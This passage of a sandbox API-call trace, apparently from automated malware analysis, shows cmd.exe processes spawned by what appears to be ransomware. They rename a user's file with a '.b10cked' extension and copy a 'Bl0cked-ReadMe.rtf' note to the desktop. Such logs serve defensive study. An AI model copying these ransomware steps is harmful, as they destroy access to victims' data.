_wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0224.500] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0224.500] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") 
returned 8 [0224.500] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0224.500] GetEnvironmentStringsW () returned 0x2b22f8* [0224.500] FreeEnvironmentStringsW (penv=0x2b22f8) returned 1 [0224.500] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0224.500] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0224.500] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0224.500] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0224.500] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0224.500] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0224.500] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0224.500] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0224.500] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0224.500] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0224.500] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef998 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0224.500] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef998, lpFilePart=0x1ef994 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1ef994*="Desktop") returned 0x18 [0224.500] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0224.501] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef714 | out: lpFindFileData=0x1ef714) returned 0x2b0038 [0224.501] FindClose (in: hFindFile=0x2b0038 | out: hFindFile=0x2b0038) returned 1 [0224.501] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1ef714 | out: lpFindFileData=0x1ef714) returned 0x2b0038 [0224.501] FindClose (in: hFindFile=0x2b0038 | out: hFindFile=0x2b0038) returned 1 [0224.501] 
FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1ef714 | out: lpFindFileData=0x1ef714) returned 0x2b0038 [0224.501] FindClose (in: hFindFile=0x2b0038 | out: hFindFile=0x2b0038) returned 1 [0224.501] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0224.501] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0224.501] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0224.501] GetEnvironmentStringsW () returned 0x2b2b18* [0224.502] FreeEnvironmentStringsW (penv=0x2b2b18) returned 1 [0224.502] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0224.502] GetConsoleOutputCP () returned 0x1b5 [0224.502] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0224.502] GetUserDefaultLCID () returned 0x409 [0224.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e24950, cchData=8 | out: lpLCData=":") returned 2 [0224.502] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1efad8, cchData=128 | out: lpLCData="0") returned 2 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1efad8, cchData=128 | out: lpLCData="0") returned 2 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1efad8, cchData=128 | out: lpLCData="1") returned 2 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e24940, cchData=8 | out: lpLCData="/") returned 2 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e24d80, cchData=32 | out: lpLCData="Mon") returned 4 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e24d40, cchData=32 | out: lpLCData="Tue") returned 4 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e24d00, cchData=32 | out: lpLCData="Wed") 
returned 4 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e24cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e24c80, cchData=32 | out: lpLCData="Fri") returned 4 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e24c40, cchData=32 | out: lpLCData="Sat") returned 4 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e24c00, cchData=32 | out: lpLCData="Sun") returned 4 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e24930, cchData=8 | out: lpLCData=".") returned 2 [0224.503] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e24920, cchData=8 | out: lpLCData=",") returned 2 [0224.503] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0224.504] GetConsoleTitleW (in: lpConsoleTitle=0x2a08f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0224.504] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0224.504] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0224.504] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0224.504] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0224.505] _wcsicmp (_String1="move", _String2=")") returned 68 [0224.505] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0224.505] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0224.505] _wcsicmp (_String1="IF", _String2="move") returned -4 [0224.505] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0224.505] _wcsicmp (_String1="REM", _String2="move") returned 5 [0224.505] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0224.513] GetConsoleTitleW (in: lpConsoleTitle=0x1ef7d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0224.513] _wcsicmp (_String1="move", 
_String2="DIR") returned 9 [0224.513] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0224.513] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0224.513] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0224.513] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0224.513] _wcsicmp (_String1="move", _String2="CD") returned 10 [0224.513] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0224.513] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0224.513] _wcsicmp (_String1="move", _String2="REN") returned -5 [0224.513] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0224.513] _wcsicmp (_String1="move", _String2="SET") returned -6 [0224.513] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0224.513] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0224.513] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0224.513] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0224.513] _wcsicmp (_String1="move", _String2="MD") returned 11 [0224.513] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0224.513] _wcsicmp (_String1="move", _String2="RD") returned -5 [0224.513] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0224.513] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0224.513] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0224.513] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0224.514] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0224.514] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0224.514] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0224.514] _wcsicmp (_String1="move", _String2="VER") returned -9 [0224.514] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0224.514] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0224.514] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0224.514] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0224.514] _wcsicmp 
(_String1="move", _String2="TITLE") returned -7 [0224.514] _wcsicmp (_String1="move", _String2="START") returned -6 [0224.514] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0224.514] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0224.514] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0224.515] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0224.515] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0224.515] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1ef58c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1ef584, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1ef584*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", 
_MaxCount=0x7) returned -12 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0224.516] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0224.517] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0224.517] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0224.517] _wcsicmp (_String1="1UP3L~1.BMP", _String2=".") returned 3 [0224.517] _wcsicmp (_String1="1UP3L~1.BMP", _String2="..") returned 3 [0224.517] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\1up3l~1.bmp")) returned 0x20 [0224.517] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2b1e80 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0224.517] SetErrorMode (uMode=0x0) returned 0x0 [0224.518] SetErrorMode (uMode=0x1) returned 0x0 [0224.518] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP", nBufferLength=0x104, lpBuffer=0x1eef14, lpFilePart=0x1eeefc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP", lpFilePart=0x1eeefc*="1UP3L~1.BMP") returned 0x32 [0224.518] SetErrorMode (uMode=0x0) returned 0x1 [0224.518] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1")) returned 0x12 [0224.518] _wcsicmp (_String1="1UP3L~1.BMP", _String2=".") returned 3 [0224.518] _wcsicmp (_String1="1UP3L~1.BMP", _String2="..") returned 3 [0224.518] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\1up3l~1.bmp")) returned 0x20 [0224.518] SetErrorMode (uMode=0x0) returned 0x0 [0224.518] SetErrorMode (uMode=0x1) returned 0x0 [0224.518] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP", nBufferLength=0x104, lpBuffer=0x1ef390, lpFilePart=0x1ef128 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP", lpFilePart=0x1ef128*="1UP3L~1.BMP") returned 0x32 [0224.518] SetErrorMode (uMode=0x0) returned 0x1 [0224.518] SetErrorMode (uMode=0x0) returned 0x0 [0224.518] SetErrorMode (uMode=0x1) returned 0x0 [0224.518] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x1ef598, lpFilePart=0x1ef128 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 
l.bmp.b10cked", lpFilePart=0x1ef128*="1up3 l.bmp.b10cked") returned 0x39 [0224.518] SetErrorMode (uMode=0x0) returned 0x1 [0224.518] SetLastError (dwErrCode=0x0) [0224.518] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\1up3 l.bmp.b10cked")) returned 0xffffffff [0224.518] GetLastError () returned 0x2 [0224.518] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x1eeaa4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eeaa4) returned 0x2a0ed0 [0224.519] FindNextFileW (in: hFindFile=0x2a0ed0, lpFindFileData=0x1eeaa4 | out: lpFindFileData=0x1eeaa4) returned 0 [0224.519] GetLastError () returned 0x12 [0224.519] FindClose (in: hFindFile=0x2a0ed0 | out: hFindFile=0x2a0ed0) returned 1 [0224.520] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP", fInfoLevelId=0x1, lpFindFileData=0x2b1c20, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2b1c20) returned 0x2a0ed0 [0224.520] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked", nBufferLength=0x104, lpBuffer=0x1eed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked", lpFilePart=0x0) returned 0x39 [0224.520] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp", nBufferLength=0x104, lpBuffer=0x1eed3c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp", lpFilePart=0x0) returned 0x31 [0224.520] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\1up3 l.bmp")) returned 0x20 [0224.520] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp" 
(normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\1up3 l.bmp"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked" (normalized: "c:\\users\\eebsym5\\desktop\\gbki\\fttfht~1\\1up3 l.bmp.b10cked"), dwFlags=0x3) returned 1 [0224.521] FindClose (in: hFindFile=0x2a0ed0 | out: hFindFile=0x2a0ed0) returned 1 [0224.521] _vsnwprintf (in: _Buffer=0x49e25040, _BufferCount=0x103, _Format="%9d", _ArgList=0x1eecf0 | out: _Buffer=" 1") returned 9 [0224.521] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.521] GetFileType (hFile=0x7) returned 0x2 [0224.524] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0224.524] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1eec7c | out: lpMode=0x1eec7c) returned 1 [0224.524] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.524] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1eecb0 | out: lpConsoleScreenBufferInfo=0x1eecb0) returned 1 [0224.525] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0224.525] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49e34640, nSize=0x2000, Arguments=0x1eecf0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0224.525] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e34640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1eecd4, lpReserved=0x0 | out: lpBuffer=0x49e34640*, lpNumberOfCharsWritten=0x1eecd4*=0x1a) returned 1 [0224.525] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.525] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0224.525] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.525] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0224.525] _get_osfhandle (_FileHandle=0) returned 0x3 [0224.525] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | 
out: lpMode=0x49e241b0) returned 1 [0224.526] SetConsoleInputExeNameW () returned 0x1 [0224.526] GetConsoleOutputCP () returned 0x1b5 [0224.526] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0224.526] SetThreadUILanguage (LangId=0x0) returned 0x409 [0224.526] exit (_Code=0) Process: id = "587" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0x128" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33599 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33600 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33601 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33602 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 33603 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: 
"c:\\windows\\system32\\cmd.exe") Region: id = 33604 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33605 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33606 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33607 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 33608 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33886 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33887 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33888 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33889 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 33890 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 33891 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: 
"c:\\windows\\system32\\winbrand.dll") Region: id = 33892 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33893 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33894 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33895 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33896 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33897 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33898 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33899 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33900 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33901 start_va = 0x76490000 end_va = 
0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33902 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33903 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 33904 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 33905 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 33906 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 33907 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 33908 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 33909 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 814 os_tid = 0x12c [0225.534] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef844 | out: lpSystemTimeAsFileTime=0x2ef844*(dwLowDateTime=0xb9fdaec0, dwHighDateTime=0x1d440a9)) [0225.534] GetCurrentProcessId () returned 0x128 [0225.534] GetCurrentThreadId () returned 0x12c [0225.534] GetTickCount () returned 0x3e426 [0225.534] QueryPerformanceCounter (in: lpPerformanceCount=0x2ef83c | out: lpPerformanceCount=0x2ef83c*=28232351046) returned 1 [0225.535] GetModuleHandleA (lpModuleName=0x0) returned 
